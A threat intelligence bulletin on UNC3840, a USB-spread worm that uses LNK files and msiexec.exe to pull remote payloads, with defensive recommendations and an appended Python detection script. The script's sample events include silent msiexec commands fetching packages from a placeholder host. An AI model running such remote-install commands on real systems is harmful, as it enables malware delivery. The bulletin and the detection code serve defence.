Intelligence on Malware, Threat Actors, and Campaigns in Motion
Introduction
Darkstream Dispatch is a monthly intelligence report dedicated to tracking and analyzing malware families, threat actors, and cyber campaigns primarily targeting Civil Society Organizations (CSOs), human rights defenders, and advocacy groups. As digital threats become more sophisticated, CSOs face increasing risks from state-sponsored actors, cybercriminals, and surveillance campaigns designed to compromise their operations, communications, and safety. This volume focuses on the worm-propagated campaign tracked as UNC3840, which spreads via infected USB storage media.
Description
This entry tracks UNC3840 activity linked to a worm that spreads through USB storage devices. The worm generates and executes an LNK file embedded with an msiexec.exe command, which retrieves and runs a remote payload. Notably, some of the command-and-control domains used by the worm resolve to IP addresses associated with what appear to be compromised QNAP storage devices. After the worm executes, UNC3840's behavior has largely consisted of reconnaissance, with second-stage payloads observed in only a few instances.
Overview
Campaign Type:
Trojan
Motivation(s):
Financial Gain
Source Region:
Unknown
Confirmed Targeted Industries:
Aerospace & Defense, Chemicals & Materials, Civil Society & Non-Profits, Construction & Engineering, Education, Energy & Utilities, Government, Healthcare, Hospitality, Legal & Professional Services, Manufacturing, Media & Entertainment, Oil & Gas, Pharmaceuticals, Retail, Technology, Telecommunications, Transportation.
Associated Threat Actors:
UNC3840
Associated Malware:
BEACON, BIRDBAIT, DENSEDROP, DENSELAUNCH, FRUITBIRD, MESSBUCKET
Targeted Countries:
Albania, Australia, Belgium, Canada, Colombia, Denmark, Egypt, France, Germany, India, Indonesia, Italy, Japan, Mexico, New Zealand, Pakistan, Philippines, Saudi Arabia, Singapore, South Africa, Sweden, Switzerland, Thailand, Ukraine, United Kingdom, United States.
Associated Tools:
CMDEXE, NLTEST, TOR, WHOAMI
Find the full list of IOCs here:
Security Recommendations
CcHUB recommends that organizations:
- Restrict USB usage: Enforce policies to disable or control USB storage; scan devices before use.
- Harden against LNK abuse: Block or monitor LNK file execution and suspicious msiexec.exe calls.
- Control msiexec.exe network activity: Restrict downloads and monitor unusual network execution.
- Block C2 infrastructure: Add known domains/IPs to blocklists; monitor outbound traffic to suspicious NAS devices.
- Network segmentation: Limit lateral movement and enforce least privilege access.
- Monitor reconnaissance behavior: Detect network scanning, SMB/RDP activity, and system discovery commands.
- Patch and secure NAS devices: Update firmware, enforce strong credentials, and restrict internet exposure.
- Deploy layered malware detection: Use EDR/XDR to detect USB worms, LNK attacks, and behavioral anomalies.
- User awareness training: Educate on USB risks, suspicious files, and reporting unusual behavior.
- Incident response planning: Prepare playbooks for quarantine, credential revocation, media isolation, and forensic analysis.
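As an added illustration of the msiexec.exe monitoring recommended above (this is example detection logic written for this page, not code or telemetry from the Darkstream Dispatch report), the following flags process-creation events where msiexec.exe is given a remote package source, the pattern the description attributes to the worm's LNK file. The event fields, domains and paths are constructed samples.

```python
import re
import shlex

# Constructed process-creation events in Sysmon Event ID 1 style.
# Placeholder domain/paths only; not indicators from the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /q /i http://payload.example/update.msi"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /V"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\app.msi"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "MSIEXEC.EXE /qn /I HTTPS://payload.example/a.msi /norestart"},
]

URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# Flags that suppress the installer UI; a remote package installed silently
# from a user-launched process is the combination worth alerting on.
QUIET_FLAGS = {"/q", "/qn", "/qb", "/quiet", "/passive"}


def classify_msiexec(event):
    """Return the reasons an event looks like remote msiexec package retrieval."""
    if not event.get("Image", "").lower().endswith("\\msiexec.exe"):
        return []
    try:
        tokens = shlex.split(event["CommandLine"], posix=False)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        tokens = event["CommandLine"].split()
    tokens = [t.strip('"') for t in tokens]
    remote = [t for t in tokens if URL_RE.match(t)]
    if not remote:
        return []
    reasons = [f"remote package source: {remote[0]}"]
    flags = {t.lower().rstrip("!") for t in tokens if t.startswith("/")}
    if flags & QUIET_FLAGS:
        reasons.append("quiet install flags")
    if event.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        reasons.append("parent is explorer.exe (consistent with a user-opened LNK)")
    return reasons


def find_suspicious(events):
    """Pair each flagged command line with its reasons; local installs are ignored."""
    return [(e["CommandLine"], r) for e in events if (r := classify_msiexec(e))]
```

Wiring the same checks into an EDR or SIEM rule, with an alert on the remote-source match and a higher severity when the quiet-flag and explorer.exe conditions also hold, gives the layered msiexec.exe and LNK coverage the recommendations call for.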
If you suspect a security breach of any kind, reach out to us via our helpdesk (help@cchub.africa).